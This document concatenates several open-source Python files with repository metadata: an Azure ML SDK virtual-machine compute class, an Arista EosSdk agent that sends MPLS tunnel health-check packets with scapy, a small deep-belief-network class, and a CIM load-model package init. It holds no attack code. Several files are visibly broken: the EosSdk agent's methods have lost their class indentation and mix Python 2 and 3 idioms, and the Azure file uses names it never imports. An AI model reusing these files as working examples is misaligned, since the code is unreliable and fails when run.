from azure.ai.ml._restclient.v2022_10_01_preview.models import (
VirtualMachineSchemaProperties,
VirtualMachineSshCredentials,
)
from azure.ai.ml._schema.compute.virtual_machine_compute import VirtualMachineComputeSchema
from azure.ai.ml.constants._common import BASE_PATH_CONTEXT_KEY, TYPE
from azure.ai.ml.constants._compute import ComputeType
from azure.ai.ml.entities._compute.compute import Compute
from azure.ai.ml.entities._util import load_from_dict
class VirtualMachineSshSettings:
    def __init__(
        self,
        *,
        admin_username: str,
        # PEP 484: a default of None requires an explicit Optional annotation;
        # the previous `str = None` annotations were misleading.
        admin_password: Optional[str] = None,
        ssh_port: int = 22,
        ssh_private_key_file: Optional[str] = None,
    ):
        """SSH settings for a virtual machine.

        :param admin_username: Describes the admin user name.
        :type admin_username: str
        :param admin_password: Describes the admin user password.
            Defaults to None. Required if ssh_private_key_file is not specified.
        :type admin_password: Optional[str]
        :param ssh_port: The ssh port number. Default is 22.
        :type ssh_port: int
        :param ssh_private_key_file: Specifies the file containing SSH rsa private key.
            Use "ssh-keygen -t rsa -b 2048" to generate your SSH key pairs.
            Required if admin_password is not specified.
        :type ssh_private_key_file: Optional[str]
        """
        self.admin_username = admin_username
        self.admin_password = admin_password
        self.ssh_port = ssh_port
        self.ssh_private_key_file = ssh_private_key_file
class VirtualMachineCompute(Compute):
    """Virtual Machine Compute resource.

    :param name: Name of the compute
    :type name: str
    :param description: Description of the resource.
    :type description: Optional[str], optional
    :param resource_id: ARM resource id of the underlying compute
    :type resource_id: str
    :param ssh_settings: SSH settings.
    :type ssh_settings: VirtualMachineSshSettings, optional
    """

    def __init__(
        self,
        *,
        name: str,
        description: Optional[str] = None,
        resource_id: str,
        ssh_settings: VirtualMachineSshSettings = None,
        **kwargs,
    ):
        kwargs[TYPE] = ComputeType.VIRTUALMACHINE
        # public_key_data is only supplied when rehydrating from the service
        # (see _load_from_rest); it is not part of the public constructor.
        self._public_key_data = kwargs.pop("public_key_data", None)
        super().__init__(
            name=name,
            location=kwargs.pop("location", None),
            description=description,
            resource_id=resource_id,
            **kwargs,
        )
        self.ssh_settings = ssh_settings

    @property
    def public_key_data(self) -> str:
        """Public key data.

        :return: Public key data.
        :rtype: str
        """
        return self._public_key_data

    @classmethod
    def _load_from_rest(cls, rest_obj: ComputeResource) -> "VirtualMachineCompute":
        """Build a VirtualMachineCompute entity from its REST representation."""
        prop = rest_obj.properties
        credentials = prop.properties.administrator_account if prop.properties else None
        ssh_settings_param = None
        # Only materialize SSH settings when the service returned either
        # credentials or a port.
        if credentials or (prop.properties and prop.properties.ssh_port):
            ssh_settings_param = VirtualMachineSshSettings(
                admin_username=credentials.username if credentials else None,
                admin_password=credentials.password if credentials else None,
                ssh_port=prop.properties.ssh_port if prop.properties else None,
            )
        response = VirtualMachineCompute(
            name=rest_obj.name,
            id=rest_obj.id,
            description=prop.description,
            location=rest_obj.location,
            resource_id=prop.resource_id,
            public_key_data=credentials.public_key_data if credentials else None,
            provisioning_state=prop.provisioning_state,
            # Surface only the first provisioning error's code, if any.
            provisioning_errors=prop.provisioning_errors[0].error.code
            if (prop.provisioning_errors and len(prop.provisioning_errors) > 0)
            else None,
            ssh_settings=ssh_settings_param,
        )
        return response

    def _to_dict(self) -> Dict:
        # pylint: disable=no-member
        return VirtualMachineComputeSchema(context={BASE_PATH_CONTEXT_KEY: "./"}).dump(self)

    @classmethod
    def _load_from_dict(cls, data: Dict, context: Dict, **kwargs) -> "VirtualMachineCompute":
        loaded_data = load_from_dict(VirtualMachineComputeSchema, data, context, **kwargs)
        return VirtualMachineCompute(**loaded_data)

    def _to_rest_object(self) -> ComputeResource:
        """Convert this entity to its REST ComputeResource representation."""
        ssh_key_value = None
        if self.ssh_settings and self.ssh_settings.ssh_private_key_file:
            ssh_key_value = Path(self.ssh_settings.ssh_private_key_file).read_text()
        credentials = VirtualMachineSshCredentials(
            username=self.ssh_settings.admin_username if self.ssh_settings else None,
            password=self.ssh_settings.admin_password if self.ssh_settings else None,
            public_key_data=self.public_key_data,
            private_key_data=ssh_key_value,
        )
        properties = VirtualMachineSchemaProperties(
            # BUGFIX: guard ssh_settings being None, matching the guards used
            # for the credential fields above; the unguarded access raised
            # AttributeError when no ssh_settings were configured.
            ssh_port=self.ssh_settings.ssh_port if self.ssh_settings else None,
            administrator_account=credentials,
        )
        vm_compute = VMResource(
            properties=properties,
            resource_id=self.resource_id,
            description=self.description,
        )
        resource = ComputeResource(name=self.name, location=self.location, properties=vm_compute)
        return resource
|
{
"content_hash": "c7fede0fb8cde7cbad930e3b6c4709c3",
"timestamp": "",
"source": "github",
"line_count": 143,
"max_line_length": 97,
"avg_line_length": 40.06993006993007,
"alnum_prop": 0.6521815008726003,
"repo_name": "Azure/azure-sdk-for-python",
"id": "5f0a64ef2516b111a364b5a0b72439a6c742cc89",
"size": "5910",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "sdk/ml/azure-ai-ml/azure/ai/ml/entities/_compute/virtual_machine_compute.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "1224"
},
{
"name": "Bicep",
"bytes": "24196"
},
{
"name": "CSS",
"bytes": "6089"
},
{
"name": "Dockerfile",
"bytes": "4892"
},
{
"name": "HTML",
"bytes": "12058"
},
{
"name": "JavaScript",
"bytes": "8137"
},
{
"name": "Jinja",
"bytes": "10377"
},
{
"name": "Jupyter Notebook",
"bytes": "272022"
},
{
"name": "PowerShell",
"bytes": "518535"
},
{
"name": "Python",
"bytes": "715484989"
},
{
"name": "Shell",
"bytes": "3631"
}
],
"symlink_target": ""
}
|
""" This program provides an agent that sends and responds to
health-check packets in order to determine the liveness of the
configured MPLS tunnels. """
import eossdk
import eossdk_utils
import functools
import json
import os
import pyinotify
import scapy
import scapy.fields
import scapy.layers.l2
import scapy.layers.inet
import scapy.packet
import scapy.route
import scapy.sendrecv
import socket
import struct
import sys
import time
# Requires: RPMs for scapy and EosSdk, as well as the eossdk_utils.py
# script (for debugging). Tunnel configuration is done at the bottom
# of this file in the main function.

# The main agent is located in the MplsTunnelLivenessAgent class below.

POLL_TIME = 1  # how often to send a liveness packet in seconds
TIMEOUT_TIME = 5  # seconds before a tunnel is declared dead
STARTUP_GRACEPERIOD = 0  # seconds after startup before we start checking a tunnel

# Make sure your IP tables are up to date on the switch:
# > sudo iptables -I INPUT -p UDP --dport 17171 -j ACCEPT
UDP_PORT = 17171

MAX_PKT_SIZE = 2048  # The maximum payload size of our packet
MAX_INT = 0xffffffff  # The maximum size of a 4 byte unsigned int
class Message(object):
    """ A Message is the payload of the health-check packets that this
    agent sends out and receives. It consists of two parts. The first
    is a header that contains a number that identifies which tunnel
    the sender sent this message out of. The header also contains a
    numeric id of the packet, and finally, a number describing how many
    'entries' are in the second part of the packet. This second part is
    a list of 0 or more 'tunnel status entries'. Each entry contains a
    numeric tunnel identifier and a boolean describing whether the
    sending switch thinks that tunnel is alive or not."""

    # Header consists of (version, pid, sender's tunnel key, msg id,
    # num status entries), as integers, in little-endian:
    header_format = '<IIIII'
    header_len = struct.calcsize(header_format)
    tunnel_entry_format = '<I?'  # tunnel_key, bool
    tunnel_entry_len = struct.calcsize(tunnel_entry_format)

    def __init__(self, pid, egress_tunnel_key, msg_id, tunnel_liveness):
        self.pid = pid
        self.egress_tunnel_key = egress_tunnel_key
        self.msg_id = msg_id
        # Mapping from tunnel_key to boolean whether this is alive or not
        self.tunnel_liveness = tunnel_liveness

    def serialize(self):
        """Pack this message into a wire-format byte string.

        Raises AssertionError if the result would exceed MAX_PKT_SIZE.
        """
        # First put the header, then one entry per tracked tunnel.
        ret = struct.pack(Message.header_format, 1, self.pid, self.egress_tunnel_key,
                          self.msg_id, len(self.tunnel_liveness))
        # .items() (not the py2-only .iteritems()) keeps this portable
        # across Python 2 and 3.
        for tunnel_key, is_alive in self.tunnel_liveness.items():
            ret += struct.pack(Message.tunnel_entry_format, tunnel_key, is_alive)
        if len(ret) > MAX_PKT_SIZE:
            # Raise explicitly instead of `assert False`: asserts are
            # stripped when running under -O, which would let an oversized
            # packet through silently.
            raise AssertionError("Packet %s too large to send!" % self.__str__())
        return ret

    def __str__(self):
        return "Message(sender_pid=%d, egress_tunnel_key=%d, id=%d, %r)" % (
            self.pid, self.egress_tunnel_key, self.msg_id, self.tunnel_liveness)

    @staticmethod
    def deserialize(buf):
        """ Given a buffer, create and return a Message from the
        buffer's contents. If the buffer does not contain a valid
        Message, this returns None.
        """
        if len(buf) < Message.header_len:
            return None
        version, pid, egress_tunnel_key, msg_id, num_entries = struct.unpack(
            Message.header_format, buf[:Message.header_len])
        if version != 1:
            return None
        msg_len = Message.header_len + Message.tunnel_entry_len * num_entries
        if len(buf) < msg_len:
            return None
        liveness = {}
        # range (not the py2-only xrange) keeps this portable.
        for i in range(Message.header_len, msg_len,
                       Message.tunnel_entry_len):
            # Unpack each status entry reported in this packet
            key, is_alive = struct.unpack(Message.tunnel_entry_format,
                                          buf[i: i + Message.tunnel_entry_len])
            liveness[key] = is_alive
        return Message(pid, egress_tunnel_key, msg_id, liveness)
class EgressTunnel(object):
    """Configuration and runtime status for one of this switch's
    outgoing MPLS tunnels."""

    def __init__(self, label, nexthop_ip_addr):
        # --- Static configuration ---
        self.mpls_label = label
        self.nexthop_ip = nexthop_ip_addr
        # --- Dynamically resolved state ---
        # Bridging MAC of the nexthop:
        self.nexthop_eth_addr = None
        # Interface that nexthop_eth_addr was learned on:
        self.egress_intf = None
        # ... and that interface's own MAC address:
        self.egress_intf_eth_addr = None
        self.last_update_time = 0
        # Tunnels start out presumed alive until proven otherwise.
        self.is_alive = True
class RemoteTunnelStatus(object):
    """Liveness bookkeeping for a tunnel owned by a remote switch
    (i.e. a tunnel whose health-check packets originate remotely)."""

    def __init__(self):
        self.last_rx_msg_id = 0
        # Timestamp of the most recent packet heard for this tunnel.
        self.last_update_time = time.time()
class RemoteSwitch(object):
    """ This object stores the configuration for our outgoing tunnels to
    this remote switch, as well as a status collection containing our view on
    the liveness of that switch's tunnels to us. """

    def __init__(self, dest_ip):
        # Configuration
        # The IP address of the remote switch
        self.destination_ip = dest_ip
        # The following dictionary keeps track of our outgoing tunnels
        # to this switch. It is a mapping from integer tunnel_key to a
        # EgressTunnel()
        self.egress_tunnels = {}

        # Status
        self.last_tx_msg_id = 0
        self.last_rx_msg_id = 0
        self.pid = 0
        # The `remote_tunnel_status` variable keeps track of whether their
        # tunnels are alive or not. It is a mapping from an integer
        # tunnel_key to a RemoteTunnelStatus() object. Note that these
        # keys correspond to the remote switch's tunnel collection, and
        # is not the same as the keys for the `tunnels` variable above.
        self.remote_tunnel_status = {}

    def liveness_dict(self, cur_time):
        """Return {tunnel_key: is_alive} for the remote switch's tunnels.

        Tunnels silent for more than TIMEOUT_TIME are reported dead;
        tunnels silent for more than 10x TIMEOUT_TIME are dropped from
        tracking entirely.
        """
        ret = {}
        # BUGFIX: iterate over a snapshot of the items. We delete stale
        # entries as we go, and mutating a dict while iterating it raises
        # RuntimeError on Python 3 (py2's .items() happened to copy).
        for key, tunnel_status in list(self.remote_tunnel_status.items()):
            time_delta = cur_time - tunnel_status.last_update_time
            if time_delta > (TIMEOUT_TIME * 10):
                # Stop sending tunnels that we haven't heard from in a
                # really long time.
                del self.remote_tunnel_status[key]
            elif time_delta > TIMEOUT_TIME:
                # Tunnel is dead!
                ret[key] = False
            else:
                ret[key] = True
        return ret
class MPLS(scapy.packet.Packet):
    """ Create an MPLS header that can be used with scapy packets """
    name = "MPLS"
    # Standard 32-bit MPLS shim header: 20-bit label, 3-bit class of
    # service, 1-bit bottom-of-stack flag, 8-bit TTL.
    fields_desc = [ scapy.fields.BitField("label", 9, 20),
                    scapy.fields.BitField("cos", 0, 3),
                    scapy.fields.BitField("s", 1, 1),
                    scapy.fields.ByteField("ttl", 0) ]

# Ethertype 0x8847 identifies an MPLS unicast payload in an Ethernet frame.
scapy.packet.bind_layers(scapy.layers.l2.Ether, MPLS, type=0x8847)
class InotifyHandler(pyinotify.ProcessEvent):
    """ A helper class handles inotify updates """
    parent = None  # the owning agent; set in my_init

    def my_init(self, **kwargs):
        # pyinotify's ProcessEvent calls my_init (not __init__) with the
        # keyword arguments passed to its constructor.
        self.parent = kwargs['parent']

    def process_IN_MODIFY(self, event):
        # The watched config file changed; have the agent re-read it.
        self.parent.process_config()
class MplsTunnelLivenessAgent(eossdk_utils.EosSdkAgent,
eossdk.AgentHandler,
eossdk.FdHandler,
eossdk.TimeoutHandler):
""" This agent is responsible for tracking the liveness of specified
MPLS tunnels. """
def __init__(self, sdk, config_file="MplsTunnelLivenessConfig.json"):
    """ Create the agent. Requires an eossdk handle, as well as the
    input configuration """
    # Grab the EosSdk managers we need for interface, MAC and neighbor
    # table lookups.
    self.agent_mgr = sdk.get_agent_mgr()
    self.eth_intf_mgr = sdk.get_eth_intf_mgr()
    self.ip_intf_mgr = sdk.get_ip_intf_mgr()
    self.mac_table_mgr = sdk.get_mac_table_mgr()
    self.neighbor_table_mgr = sdk.get_neighbor_table_mgr()
    self.tracer = eossdk.Tracer("MplsTunnelLivenessAgent")
    eossdk_utils.EosSdkAgent.__init__(self)
    eossdk.AgentHandler.__init__(self, self.agent_mgr)
    eossdk.TimeoutHandler.__init__(self, sdk.get_timeout_mgr())
    eossdk.FdHandler.__init__(self)
    self.tracer.trace0("MPLS tunnel liveness agent constructed")
    self.initialized = False
    self.pid = os.getpid()
    # The l3 interface we should grab our "SRC IP" from. Read from
    # the config:
    self.src_intf = None
    self.src_ip = None  # Resolved after reading from config
    # A UDP socket that receives liveness packets from other
    # agents. Created during on_initialized
    self.rx_sock = None
    # A mapping from remote switch IP to RemoteSwitch()
    self.remote_switches = {}
    self.config_file = config_file
    # Watch the config file with inotify so edits are picked up live,
    # without restarting the agent.
    self.wm = pyinotify.WatchManager()
    handler = functools.partial(InotifyHandler, parent=self)
    # pylint: disable-msg=E1101
    self.wm.watch_transient_file(config_file, pyinotify.IN_MODIFY, handler)
    # pylint: enable-msg=E1101
    self.notifier = pyinotify.AsyncNotifier(self.wm,
                                            InotifyHandler(parent=self))
    self.notifier.coalesce_events(True)
    self.inotify_fd = self.wm.get_fd()
    self.watch_readable(self.inotify_fd, True)
    # Read our initial configuration
    self.process_config()
def on_initialized(self):
""" Update our configured egress tunnels. Start all tunnels as
alive, with a last_update_time of now + any grace
period. Calculate the output interfaces for each tunnel based
off of that tunnel's nexthop MAC address. """
self.initialized = True
self.tracer.trace2("Looking up the IP address for interface " + self.src_intf)
src_ips = self.ip_intf_mgr.ip_addrs(eossdk.IntfId(self.src_intf))
if not src_ips:
assert False, "No IP addresses assigned to %s" % self.src_intf
self.src_ip = src_ips[0].addr().to_string()
self.tracer.trace2("Using src IP address " + self.src_ip)
self.tracer.trace2("Create the socket that receives remote probes")
self.rx_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.rx_sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.rx_sock.bind((self.src_ip, UDP_PORT))
self.rx_sock.setblocking(0)
self.watch_readable(self.rx_sock.fileno(), True)
self.resolve_config()
def handle_tunnel_alive(self, dst_ip, tunnel_key, tunnel):
self.tracer.trace3("Tunnel %d to %s came back!" % (tunnel_key, dst_ip))
# Do any other logic (a.k.a. alert another agent that
# tunnel.mpls_label is usable again)
def handle_tunnel_death(self, dst_ip, tunnel_key, tunnel):
self.tracer.trace3("Tunnel %d to %s died!" % (tunnel_key, dst_ip))
# Do any other logic (a.k.a. alert another agent that
# tunnel.mpls_label is no longer a valid tunnel)
def on_timeout(self):
""" Time to send some packets to our neighbors! Our poller
fired, so we should send out our heartbeat packets. We also
check if we haven't heard about any of our tunnels recently, and
if so, mark them as dead. """
cur_time = time.time()
for host in self.remote_switches.itervalues():
liveness_dict = host.liveness_dict(cur_time)
host.last_tx_msg_id += 1
if host.last_tx_msg_id > MAX_INT:
host.last_tx_msg_id = 1
for key, tunnel in host.egress_tunnels.iteritems():
msg = Message(self.pid, key, host.last_tx_msg_id, liveness_dict)
self.send_packet(host.destination_ip, tunnel, msg)
if tunnel.is_alive and (
time.time() - tunnel.last_update_time > TIMEOUT_TIME):
# There has been no updates to this tunnel at all
# within our timeout period.
tunnel.is_alive = False
self.handle_tunnel_death(host.destination_ip, key, tunnel)
# Schedule us to be called again in the future
self.timeout_time_is(eossdk.now() + POLL_TIME)
def on_readable(self, fd):
""" We got a packet on our UDP port! Read the packet, update our
views of the remote tunnel's liveness, and then parse the
packet's payload to inspect what the remote packet thinks of
*our* tunnel liveness. If any liveness changed, then fire our
handlers. """
if fd == self.inotify_fd:
self.tracer.trace6("Inotify fd %d is readable" % self.inotify_fd)
self.notifier.handle_read()
return
if fd != self.rx_sock.fileno():
assert False, "Unknown socket became readable %d" % fd
data, addr = self.rx_sock.recvfrom(MAX_PKT_SIZE)
src_ip = addr[0]
self.tracer.trace6("Received message from %r" % src_ip)
if not data:
self.tracer.trace7("Received empty message, ignoring.")
return
msg = Message.deserialize(data)
if not msg:
self.tracer.trace7("Received invalid message, ignoring! "
"First 500 bytes of pkt: %r" % data[:500])
return
self.tracer.trace8("Got message %s" % str(msg))
if src_ip not in self.remote_switches:
self.tracer.trace7("Got packet from unknown host: %r" % src_ip)
return
remote_switch = self.remote_switches[src_ip]
remote_tunnel_status = remote_switch.remote_tunnel_status.setdefault(
msg.egress_tunnel_key, RemoteTunnelStatus())
if msg.pid != remote_switch.pid:
# This is the either the first message we've received from
# them, or their remote switch restarted. In any case, the
# msg IDs they are sending will have been reset.
remote_switch.pid = msg.pid
remote_switch.last_rx_msg_id = 0
remote_tunnel_status.last_rx_msg_id = 0
# First track we got a packet from the sender's tunnel named
# in the packet.
if self.is_new_id(remote_tunnel_status.last_rx_msg_id, msg.msg_id):
# Do we care about packets coming in out of order?
remote_tunnel_status.last_update_time = time.time()
remote_tunnel_status.last_rx_msg_id = msg.msg_id
# Then inspect the body of the packet that tells me which of
# my tunnel statuses the remote switch has seen.
if not self.is_new_id(remote_switch.last_rx_msg_id, msg.msg_id):
# We've already seen newer messages. Ignore the this.
self.tracer.trace7("Got old message with id: %d (currently at %d)"
% (msg.msg_id, remote_switch.last_rx_msg_id))
return
remote_switch.last_rx_msg_id = msg.msg_id
for tunnel_key, is_alive in msg.tunnel_liveness.iteritems():
if tunnel_key not in remote_switch.egress_tunnels:
# They are telling us about one of our egress tunnels that
# we have no record of...
self.tracer.trace0("Got tunnel status for an unknown key: %r" %
tunnel_key)
continue
tunnel = remote_switch.egress_tunnels[tunnel_key]
tunnel.last_update_time = time.time()
# Check if the remote switch thinks our egress tunnel is
# up or down. If it changed, call our handlers!
if tunnel.is_alive == is_alive:
self.tracer.trace9("No change to liveness for tunnel %d" % tunnel_key)
continue
elif is_alive:
tunnel.is_alive = True
self.handle_tunnel_alive(src_ip, tunnel_key, tunnel)
else:
tunnel.is_alive = False
self.handle_tunnel_death(src_ip, tunnel_key, tunnel)
def resolve_egress_tunnel(self, tunnel):
self.tracer.trace8("Resolve the nexthop IP %s to an ethernet address" %
tunnel.nexthop_ip)
neighbor_key = eossdk.NeighborKey(
eossdk.IpAddr(tunnel.nexthop_ip), eossdk.IntfId())
neighbor_entry = self.neighbor_table_mgr.neighbor_entry_status(neighbor_key)
if neighbor_entry == eossdk.NeighborEntry():
self.tracer.trace8("Checking static ARP entries")
neighbor_entry = self.neighbor_table_mgr.neighbor_entry(neighbor_key)
if neighbor_entry == eossdk.NeighborEntry():
self.tracer.trace0("IP address %r has no ARP entry" %
tunnel.nexthop_ip)
assert False, "Unlearned nexthop IP %s" % tunnel.nexthop_ip
nexthop_eth_addr = neighbor_entry.eth_addr()
self.tracer.trace5("IP %s lives on %s" %
(tunnel.nexthop_ip, nexthop_eth_addr.to_string()))
tunnel.nexthop_eth_addr = nexthop_eth_addr.to_string()
self.tracer.trace8("Now resolving that MAC entry to an interface.")
# TODO: Is this necessary if we send it out of the "fabric"
# interface?
vlan_id = 1
mac_entry = self.mac_table_mgr.mac_entry(vlan_id, nexthop_eth_addr)
if mac_entry.intf() == eossdk.IntfId():
self.tracer.trace0("Mac entry %r not on any interface" %
tunnel.nexthop_eth_addr)
assert False, "Unlearned nexthop MAC %s" % tunnel.nexthop_eth_addr
intf = mac_entry.intf().to_string()
# Convert the interface names to the kernel interface names
intf = intf.replace("Ethernet", "et")
intf = intf.replace("Port-Channel", "po")
self.tracer.trace5("MAC entry %s is learned on inteface %r" %
(tunnel.nexthop_eth_addr, intf))
tunnel.egress_intf = intf
self.tracer.trace8("Looking up that interface's MAC address")
egress_eth_addr = self.eth_intf_mgr.eth_addr(mac_entry.intf())
if egress_eth_addr == eossdk.EthAddr():
assert False, "Interface %s has no MAC address" % intf
self.tracer.trace5("Intf %s has MAC address %s" %
(intf, egress_eth_addr.to_string()))
tunnel.egress_intf_eth_addr = egress_eth_addr.to_string()
def send_packet(self, dst_ip, tunnel, msg):
""" Wrap `msg` in a UDP-over-MPLS packet, using `dst_ip` and the tunnel's
MPLS label, and send the packet out of the tunnel's egress interface."""
self.tracer.trace8("Sending message %s" % str(msg))
payload = msg.serialize()
pkt = scapy.layers.l2.Ether(src=tunnel.egress_intf_eth_addr,
dst=tunnel.nexthop_eth_addr)
pkt = (pkt / MPLS(label=tunnel.mpls_label, ttl=64) /
scapy.layers.inet.IP(src=self.src_ip,
dst=dst_ip) /
scapy.layers.inet.UDP(dport=UDP_PORT) /
(payload))
# In the real world we might make this non-blocking, but for now
# we assume packet always get sent in one go. Also, it might be
# worth maintaining our own socket to the egress interface to
# save us the work of creating/tearing down raw sockets
# constantly.
scapy.sendrecv.sendp(pkt, iface=tunnel.egress_intf, verbose=0)
def process_config(self):
self.tracer.trace1("Processing configuration change on %s" %
self.config_file)
with open(self.config_file) as f:
cfg = json.loads(f.read())
if not self.initialized:
# Write the src_intf only once.
self.src_intf = cfg["src_intf"]
# Clear out the previous config:
self.remote_switches = {}
# And signify that we are a new process by changing our
# advertised pid. It would be preferable to just only update the
# newly configured tunnels, but that's more complicated for now.
self.pid -= 1
for rs in cfg["remote_switches"]:
dst_ip = rs["destination_ip"]
dst = RemoteSwitch(dst_ip)
for tunnel_key_str, tunnel_info in rs["tunnels"].iteritems():
tunnel_key = int(tunnel_key_str)
dst.egress_tunnels[tunnel_key] = EgressTunnel(
tunnel_info["label"], tunnel_info["nexthop_ip"])
self.remote_switches[dst_ip] = dst
if self.initialized:
self.resolve_config()
def resolve_config(self):
self.tracer.trace2("Resolving all of our configured tunnels")
for host in self.remote_switches.itervalues():
for tunnel in host.egress_tunnels.itervalues():
tunnel.last_update_time = time.time() + STARTUP_GRACEPERIOD
self.resolve_egress_tunnel(tunnel)
self.timeout_time_is(eossdk.now() + POLL_TIME)
def is_new_id(self, last_seen_id, new_id):
# Returns True if the new_id is larger than the last_seen_id, or
# the new_id has wrapped around.
return (last_seen_id < new_id) or ((last_seen_id - new_id) > (MAX_INT / 2))
def main(args):
   """ Build the SDK handle and the liveness agent, then hand control
   to the EOS SDK event loop (which normally never returns). """
   sdk = eossdk.Sdk()
   # Keep a reference so the agent object stays alive for the loop.
   agent = MplsTunnelLivenessAgent(sdk)  # pylint: disable=unused-variable
   sdk.main_loop(args)
if __name__ == "__main__":
   # Script entry point: forward command-line args to the SDK loop.
   main(sys.argv)
|
{
"content_hash": "30d64882d029b58fc6b0c4bac1f90aa0",
"timestamp": "",
"source": "github",
"line_count": 496,
"max_line_length": 85,
"avg_line_length": 41.78225806451613,
"alnum_prop": 0.6367979154603358,
"repo_name": "aristanetworks/EosSdk",
"id": "8c1df1ae7d234b49c44ebd3ae1735f87641989de",
"size": "20866",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "examples/MplsTunnelLivenessAgent.py",
"mode": "33261",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "584"
},
{
"name": "C++",
"bytes": "1409997"
},
{
"name": "Dockerfile",
"bytes": "3130"
},
{
"name": "M4",
"bytes": "3597"
},
{
"name": "Makefile",
"bytes": "5620"
},
{
"name": "Python",
"bytes": "548"
},
{
"name": "SWIG",
"bytes": "38729"
},
{
"name": "Shell",
"bytes": "1769"
}
],
"symlink_target": ""
}
|
from ..base import model
import numpy
from ..util.preprocessing import as_matrix
from autoencoder import autoencoder
import nn
class dbn(model):
    """Deep belief network: a stack of layers optionally pretrained
    with autoencoders and fine-tuned with backpropagation."""

    def __init__(self, layers, pretrain=True):
        """
        Initialization of the deep belief network with given layers.

        arguments:
            layers - list of Layer objects
            pretrain - whether or not to pretrain layers with
                       autoencoders
        """
        self.layers = layers
        # initialize hidden layer weights
        self.init_weights()
        self.pretrain = pretrain

    def init_weights(self):
        """Initialize each hidden layer's weights, sized by the number
        of visible units in the layer below."""
        # the input layer doesn't have weights
        for layer_index in range(1, len(self.layers)):
            layer = self.layers[layer_index]
            layer.init_weights(len(self.layers[layer_index - 1].visible))

    def propagate_forward(self, row):
        """Feed one input row forward through every layer, leaving the
        activations in each layer's `visible` attribute."""
        if self.layers[0].bias:
            # Slot 0 of the visible vector is the bias unit; keep it.
            self.layers[0].visible[1:] = row
        else:
            self.layers[0].visible = row
        for layer_index in range(1, len(self.layers)):
            layer = self.layers[layer_index]
            layer.propagate_forward(self.layers[layer_index - 1].visible)

    def fit(self, x, y, iterations=1, shuffle=True):
        """Train the network on data x with targets y.

        arguments:
            x - training data (rows of features)
            y - training targets aligned with the rows of x
            iterations - number of passes over the data
            shuffle - whether to shuffle rows (and targets) each pass
        returns:
            list of per-row summed output errors seen during training
        """
        data = as_matrix(x)
        # Fix: convert y to an array so the fancy-indexing below
        # (response[inds]) also works when callers pass a plain list.
        response = numpy.asarray(y)
        self.layers[0] = nn.layer(len(data[0]), bias=self.layers[0].bias)
        # initialize the hidden layers with stacked autoencoders
        if self.pretrain:
            out = x
            for index in range(1, len(self.layers) - 1):
                layer = self.layers[index]
                trained = autoencoder(len(layer.visible))
                trained.fit(out)
                out = trained.predict(out)
                layer.weights = trained.layers[1].weights
        errors = []
        for iteration in range(iterations):
            if shuffle:
                # Permute data and targets in lockstep.
                inds = numpy.random.permutation(range(len(data)))
                data = data[inds]
                response = response[inds]
            for row_ind, row in enumerate(data):
                # propagate forward
                self.propagate_forward(row)
                # propagate backward -- the input weights never change
                layer = self.layers[-1]
                target = response[row_ind]
                errors.append(sum(target - layer.visible))
                # do hidden layers
                for layer_index in range(len(self.layers) - 1, 0, -1):
                    layer = self.layers[layer_index]
                    input_layer = self.layers[layer_index - 1]
                    target = layer.propagate_backward(input_layer, target)
        return errors

    def predict(self, x):
        """Run each row of x through the network; returns a 2-D numpy
        array of output-layer activations."""
        data = as_matrix(x)
        predicted = []
        for row in data:
            # propagate forward
            self.propagate_forward(row)
            prediction = self.layers[-1].visible
            predicted.append(prediction)
        return numpy.array(predicted)
|
{
"content_hash": "a8fa0dee378b53e0884b6575e942fefd",
"timestamp": "",
"source": "github",
"line_count": 90,
"max_line_length": 74,
"avg_line_length": 32.888888888888886,
"alnum_prop": 0.5574324324324325,
"repo_name": "arider/riderml",
"id": "7e6299e8701eed4d4be609945cace3099264febf",
"size": "2960",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "riderml/neural_network/dbn.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "95263"
}
],
"symlink_target": ""
}
|
"""This package is responsible for modeling the energy consumers and the system load as curves and associated curve data. Special circumstances that may affect the load, such as seasons and daytypes, are also included here. This information is used by Load Forecasting and Load Management.
"""
from CIM14.CPSM.Equipment.LoadModel.EnergyArea import EnergyArea
from CIM14.CPSM.Equipment.LoadModel.Season import Season
from CIM14.CPSM.Equipment.LoadModel.SubLoadArea import SubLoadArea
from CIM14.CPSM.Equipment.LoadModel.NonConformLoadSchedule import NonConformLoadSchedule
from CIM14.CPSM.Equipment.LoadModel.LoadResponseCharacteristic import LoadResponseCharacteristic
from CIM14.CPSM.Equipment.LoadModel.ConformLoadSchedule import ConformLoadSchedule
from CIM14.CPSM.Equipment.LoadModel.NonConformLoadGroup import NonConformLoadGroup
from CIM14.CPSM.Equipment.LoadModel.ConformLoadGroup import ConformLoadGroup
from CIM14.CPSM.Equipment.LoadModel.ConformLoad import ConformLoad
from CIM14.CPSM.Equipment.LoadModel.NonConformLoad import NonConformLoad
from CIM14.CPSM.Equipment.LoadModel.StationSupply import StationSupply
from CIM14.CPSM.Equipment.LoadModel.SeasonDayTypeSchedule import SeasonDayTypeSchedule
from CIM14.CPSM.Equipment.LoadModel.LoadArea import LoadArea
from CIM14.CPSM.Equipment.LoadModel.DayType import DayType
from CIM14.CPSM.Equipment.LoadModel.LoadGroup import LoadGroup
# CIM namespace URI and prefix identifying the LoadModel profile.
nsURI = "http://iec.ch/TC57/2009/CIM-schema-cim14?profile=http://iec.ch/TC57/2007/profile#LoadModel"
nsPrefix = "cimLoadModel"
class SeasonName(str):
    """Values are: fall, winter, spring, summer
    """
    # Plain str subclass acting as a lightweight enumeration of
    # season names for the CIM Season type.
    pass
|
{
"content_hash": "dcfd1b7a31f5c2cd8dbd44a7505a9f89",
"timestamp": "",
"source": "github",
"line_count": 27,
"max_line_length": 290,
"avg_line_length": 59.74074074074074,
"alnum_prop": 0.8462492250464972,
"repo_name": "rwl/PyCIM",
"id": "3df37941eca0c4a59f94082e7ff5c380a37186c1",
"size": "2713",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "CIM14/CPSM/Equipment/LoadModel/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "7420564"
}
],
"symlink_target": ""
}
|
import bisect
import cv2
import os
import pickle
import Queue
import sys
import threading
import time
import traceback
import json
from collections import namedtuple
